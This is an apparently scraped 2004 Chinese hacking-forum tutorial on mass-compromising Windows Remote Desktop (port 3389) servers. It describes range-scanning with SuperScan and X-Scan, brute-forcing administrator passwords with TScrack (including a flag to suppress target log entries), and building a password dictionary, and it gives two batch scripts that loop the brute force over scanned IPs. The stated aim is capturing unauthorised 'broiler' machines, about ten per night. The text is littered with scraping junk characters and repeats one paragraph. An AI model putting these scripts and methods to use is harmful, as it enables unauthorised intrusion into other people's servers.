|
作者:霜风 QQ:14226581 : A8 ^; l0 r% L. \; w2 n
终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。6 o" C% _# Q7 b! _/ _: T) f
这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: 4 u7 {' C0 O: O% Z
首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:' f8 g. ~- i3 M
先打开superscan3如图1
3 b7 N/ P, z0 p; e
?2 J9 s5 C' J) b! [* g8 i此主题相关图片如下:/ L9 B/ z' r. u9 W6 X5 y( H, W
! e: `4 Y' F# X( r
! i% _2 j( M; m0 c, H% t接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图27 p1 J/ }7 X7 x. ?' }$ U
* z) [* M) \+ h( C9 g9 w4 u
此主题相关图片如下:
6 x# N/ p, R- [6 S; w, O" ?: F# A) Z& N; e. m" h, C( E3 J
0 Z+ a, H0 Z7 U然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.( }: I( L& Q6 i8 A ]
这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3! a" p# P0 L% x. }$ y
3 H( j9 m- Q f# ]9 X7 [
此主题相关图片如下:
/ ]& W# Z7 P, B; _3 A, U
( ?4 ?8 s H0 B7 {. |' y' ], f4 Y2 M. o2 z
“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。6 P1 v f; W6 y+ g, ~! ?
" e7 d9 ~! I3 T5 I2 E
此主题相关图片如下:4 e4 z) p h8 o- |1 |
; P! i4 T! }# X# s4 w/ e
接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5
$ Y% w/ v# ?% a t. |- G0 |0 ^8 i( ?
此主题相关图片如下:. s, t6 S2 C2 k( h9 d8 L7 L
. [/ @/ k" b7 `! b! ]
进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
( R7 [3 |. g! K! I; d所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。0 O7 o+ F# x4 E- \8 z6 v: u+ O
TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
* X- G0 Z& N4 Z! r8 q% q$ `% z此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。2 b( w8 p- V/ ~- i [
在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:& G6 S f# A3 a( L: @1 ^' S
-h : Print usage help and exit, K# v9 d. q: m+ [9 {0 @* u
-V : Print version info and exit
+ t) t9 j* b& }-s : Print chipher strenght info and exit
) c, F$ ]0 s1 M$ u; a-b : Enable failed password beep
, ? M$ K) |9 }! n4 a-t : Use two simultaneous connections [EXPERIMENTAL]
( ~7 u: O2 R9 p- L-N : Prevent System Log entries on targeted server
* k# f9 _/ }- T2 w-U : Uninstall tscrack and remove components4 |9 w3 m' T3 O- R& ]# c) I
-f <number> : Wordlist entry to start cracking with/ {+ f' X+ o4 y+ d! K+ X
-F <delay> : Sampling Frequency (Delay between samples in ms)
0 V, p! ?: E$ f5 t* D-l <user> : Account name to use, defaults to Administrator+ \; k: _& p/ p* E; o$ t3 M5 ]$ G
-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted
, t+ u/ o! v; `: Q9 E. ]-p <password> : Use <password> to logon instead of wordlist/blank pass' ~; w @, D. Y7 B1 I# X/ Q
-D <domain> : Specify domain to attempt logon to - b E7 x0 `3 u, C/ B# J3 h
' [' U8 U, p! E( F3 E" p. ]3 P+ s& S9 }: ?
我就帮忙翻译一下吧,翻译得不好可不要怪我啊:* F8 T! Y: F, K+ R! ~) b
-h : 显示使用帮助然后退出. Z# L6 _$ d- m% I
-V : 显示版本信息然后退出
% a9 \8 W6 d1 j7 B5 x+ ]' z-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明) n! A1 ~6 [' S7 Z; p# v
-b : 密码错误时发出声音! v1 T7 B$ ~' Z/ B
-t : 同时发出多个连接,就是多线程。
, S N& g3 E0 L$ j( ]1 O-N : Prevent System Log entries on targeted server
E( h$ C3 h: L( }: u9 `+ J! j-U : 卸载移除tscrack组件。
: z) j. P3 E& u( _* x8 g3 e-f <number> : 使用-F后面的密码。1 ^ M7 F3 i2 g* u1 r" u3 L/ V. l1 q
-F <delay> : 间隔时间(频率)% ]+ h( D8 d, o% [7 e& M
-l <user> : 使用-L后面的用户名* Z( ~- }2 {" D# p0 y4 b3 {5 k9 \
-w <wordlist> : 使用-W后面的字典3 E" r+ Z! z# z3 }& W' ?/ c3 w6 B
-p <password> : 使用-W后的密码) q2 t/ j$ x# h( c
-D <domain> : 登陆主页面?
9 n& T- I0 V8 m+ E相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:
: E& _( i* _( p( c4 u! r ]@if not exist IpcScan.txt goto noscan
) \# Z/ e) i0 _' Y: v6 W# ?' ]@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i' B; k1 K1 E! _
:noscan
' n, Y8 \# I9 U. ^* x6 A@echo 3389.txt no find or scan faild  0 k0 E* f/ y, \8 u
这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)
+ j6 J k; U+ U: X. E# x/ k. S保存后把后错名改为BAT就可以了。
9 e: Q1 M1 {& ]$ o- {- D还写一个BAT,名字为HACK.BAT,代码如下:& x* K0 c# u0 U/ W( X- Z5 v0 `( J& H
@if not exist tscrack.exe goto noscan
8 e- E1 a/ u) K) g* R! ~@tscrack %1 -l administartor -w pass.dic >>rouji.txt) `0 m" u9 f' Q; Z
:noscan+ w. K3 z8 `& z( `8 v. [
@echo tscrack.exe no find or scan faild . T; m. N- w4 P( {9 J2 y
这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC; J: P+ e9 [: k' V5 s. Q+ N) Y; E
制作方法如上。4 M% T8 H; C; p* {
然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图67 f* ~; P) c5 @ i, r5 B. w
( E5 `) G/ _1 e4 y3 K
此主题相关图片如下:
! G! p! H, P1 Z; u怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
8 }0 V$ h/ D' H) e/ B; B) N* Z最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图71 W8 f9 i5 {: P
$ ^: Z- E/ L7 Z6 v
此主题相关图片如下:
% N T# E3 E2 J) v9 T6 S3 [% h! M$ T1 r2 A, M
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
& x- ]7 D+ C7 E& R4 x最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
